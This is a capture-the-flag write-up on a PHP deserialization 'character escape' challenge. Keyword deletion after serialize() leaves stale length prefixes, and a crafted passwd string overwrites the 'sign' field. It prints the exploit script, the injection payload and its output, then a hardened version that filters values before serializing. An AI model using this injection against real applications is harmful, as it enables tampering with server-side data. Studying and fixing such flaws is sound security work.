You can't escape even if you want to (deserialization character escape)

Challenge:

<?php
/*
    https://ytyyds.github.io/ (unrelated to this challenge)
*/
error_reporting(0);
highlight_file(__FILE__);
function filter($string){
    return preg_replace( '/phtml|php3|php4|php5|aspx|gif/','', $string);
}
$user['username'] = $_POST['name'];
$user['passwd'] = $_GET['passwd'];
$user['sign'] = '123456';

// filter() is applied to the serialized string, not to the individual values
$ans = filter(serialize($user));
if(unserialize($ans)['sign'] == "ytyyds"){
    echo file_get_contents('flag.php');
}

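Approach:
filter() runs on the serialized string, after the s:N length prefixes have already been written. Every keyword it deletes shortens the string while the declared length stays the same, so unserialize() reads past the original closing quote. This character escape lets the input rewrite the value of sign.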

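<?php

function filter($string){
    return preg_replace( '/phtml|php3|php4|php5|aspx|gif/','', $string);
}
// 5 x "aspx" = 20 characters that filter() deletes, while the s:20 prefix stays
$user['username'] = "aspxaspxaspxaspxaspx";
// The 20 bytes ";s:6:"passwd";s:46: are then read as the username value,
// so this string is parsed as serialized structure rather than as data
$user['passwd'] = ';s:6:"passwd";s:0:"";s:4:"sign";s:6:"ytyyds";}';
// The challenge hard-codes '123456' here; either way this entry lands after
// the injected closing } and is ignored
$user['sign'] = 'ytyyds';

$ans = filter(serialize($user));
echo $ans;
var_dump(unserialize($ans));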

a:3:{s:8:"username";s:20:"";s:6:"passwd";s:46:";s:6:"passwd";s:0:"";s:4:"sign";s:6:"ytyyds";}";s:4:"sign";s:6:"ytyyds";}array(3) {
["username"]=>
string(20) "";s:6:"passwd";s:46:"
["passwd"]=>
string(0) ""
["sign"]=>
string(6) "ytyyds"
}
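
The root cause is the order of operations, so the fix is to filter each value before serialize() rather than filtering the serialized string. The following is an added example, not code from the original post or the challenge author; the function names build_vulnerable, build_hardened and sign_intact are hypothetical, and it replays the same input against both orderings.

```php
<?php
// Added example: the challenge's filter, applied in two different orders.
function filter($string) {
    return preg_replace('/phtml|php3|php4|php5|aspx|gif/', '', $string);
}

// Vulnerable order, as in the challenge: serialize first, then filter.
// Deleting bytes here leaves the s:N length prefixes stale.
function build_vulnerable(array $user): string {
    return filter(serialize($user));
}

// Hardened order: filter every value first, then serialize, so each s:N
// prefix is computed on the bytes that are actually stored.
function build_hardened(array $user): string {
    return serialize(array_map('filter', $user));
}

// Round-trip check: the server-controlled sign must come back unchanged.
// allowed_classes => false additionally blocks object instantiation.
function sign_intact(string $blob, string $expected): bool {
    $data = unserialize($blob, ['allowed_classes' => false]);
    return is_array($data) && ($data['sign'] ?? null) === $expected;
}

// Same input as the write-up, with sign set to the challenge's own value.
$user = [
    'username' => 'aspxaspxaspxaspxaspx',
    'passwd'   => ';s:6:"passwd";s:0:"";s:4:"sign";s:6:"ytyyds";}',
    'sign'     => '123456',
];

echo "vulnerable order keeps sign: ";
var_dump(sign_intact(build_vulnerable($user), '123456'));
echo "hardened order keeps sign:   ";
var_dump(sign_intact(build_hardened($user), '123456'));
```

With the hardened order the passwd string is stored as ordinary data under a correct length prefix, so it can no longer be parsed as structure.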

posted @ 2025-05-08 11:13  lethe311